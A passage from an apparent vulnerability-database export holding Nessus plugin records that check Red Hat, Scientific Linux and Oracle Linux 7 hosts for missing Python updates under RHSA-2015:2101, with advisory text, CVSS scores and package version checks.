load_cert_chain() function now accepts 'None' as a\n keyfile argument.\n\nIn addition, this update adds the following enhancements :\n\n - Security enhancements as described in PEP 466 have been\n backported to the Python standard library, for example,\n new features of the ssl module: Server Name Indication\n (SNI) support, support for new TLSv1.x protocols, new\n hash algorithms in the hashlib module, and many more.\n\n - Support for the ssl.PROTOCOL_TLSv1_2 protocol has been\n added to the ssl library.\n\n - The ssl.SSLSocket.version() method is now available to\n access information about the version of the SSL protocol\n used in a connection.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1512&L=scientific-linux-errata&F=&S=&P=10966\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d3f33a7f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-debuginfo-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-libs-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-debuginfo / python-devel / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:09:40", "description": "Updated python packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme, or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the size of gzip-compressed HTTP responses. A malicious XMLRPC server could cause an XMLRPC client using xmlrpclib to consume an excessive amount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict the sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL encoded paths. A remote attacker could use this flaw to execute scripts outside of the cgi-bin directory, or disclose the source code of the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control these arguments could use this flaw to disclose portions of the application memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index arguments passed to certain functions (such as raw_decode()). An attacker able to control the index value passed to one of the affected functions could possibly use this flaw to disclose portions of the application memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib) did not perform verification of TLS/SSL certificates when connecting to HTTPS servers. A man-in-the-middle attacker could use this flaw to hijack connections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable certificate verification by default. However, for backwards compatibility, verification remains disabled by default. Future updates may change this default. Refer to the Knowledgebase article 2039753 linked to in the References section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads previously tried to close epoll file descriptors twice, which led to an 'Invalid argument' error. Subprocesses have been fixed to close the file descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the '-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile argument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported to the Python standard library, for example, new features of the ssl module: Server Name Indication (SNI) support, support for new TLSv1.x protocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information about the version of the SSL protocol used in a connection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-20T00:00:00", "type": "nessus", "title": "RHEL 7 : python (RHSA-2015:2101)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2020-02-27T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python", "p-cpe:/a:redhat:enterprise_linux:python-debug", "p-cpe:/a:redhat:enterprise_linux:python-debuginfo", "p-cpe:/a:redhat:enterprise_linux:python-devel", "p-cpe:/a:redhat:enterprise_linux:python-libs", "p-cpe:/a:redhat:enterprise_linux:python-test", "p-cpe:/a:redhat:enterprise_linux:python-tools", "p-cpe:/a:redhat:enterprise_linux:tkinter", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2015-2101.NASL", "href": "https://www.tenable.com/plugins/nessus/86968", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2101. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86968);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/27\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_xref(name:\"RHSA\", value:\"2015:2101\");\n\n script_name(english:\"RHEL 7 : python (RHSA-2015:2101)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2101\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1753\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-4616\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-4650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7185\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2101\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"python-debuginfo-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"python-libs-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-test-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-debuginfo / python-devel / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:09:56", "description": "From Red Hat Security Advisory 2015:2101 :\n\nUpdated python packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme, or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the size of gzip-compressed HTTP responses. A malicious XMLRPC server could cause an XMLRPC client using xmlrpclib to consume an excessive amount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict the sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL encoded paths. A remote attacker could use this flaw to execute scripts outside of the cgi-bin directory, or disclose the source code of the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled its offset and size arguments. An attacker able to control these arguments could use this flaw to disclose portions of the application memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index arguments passed to certain functions (such as raw_decode()). An attacker able to control the index value passed to one of the affected functions could possibly use this flaw to disclose portions of the application memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib) did not perform verification of TLS/SSL certificates when connecting to HTTPS servers. A man-in-the-middle attacker could use this flaw to hijack connections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable certificate verification by default. However, for backwards compatibility, verification remains disabled by default. Future updates may change this default. Refer to the Knowledgebase article 2039753 linked to in the References section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads previously tried to close epoll file descriptors twice, which led to an 'Invalid argument' error. Subprocesses have been fixed to close the file descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the '-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile argument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported to the Python standard library, for example, new features of the ssl module: Server Name Indication (SNI) support, support for new TLSv1.x protocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information about the version of the SSL protocol used in a connection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-24T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : python (ELSA-2015-2101)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:python", "p-cpe:/a:oracle:linux:python-debug", "p-cpe:/a:oracle:linux:python-devel", "p-cpe:/a:oracle:linux:python-libs", "p-cpe:/a:oracle:linux:python-test", "p-cpe:/a:oracle:linux:python-tools", "p-cpe:/a:oracle:linux:tkinter", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2015-2101.NASL", "href": "https://www.tenable.com/plugins/nessus/87020", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:2101 and \n# Oracle Linux Security Advisory ELSA-2015-2101 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87020);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_xref(name:\"RHSA\", value:\"2015:2101\");\n\n script_name(english:\"Oracle Linux 7 : python (ELSA-2015-2101)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:2101 :\n\nUpdated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-November/005559.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 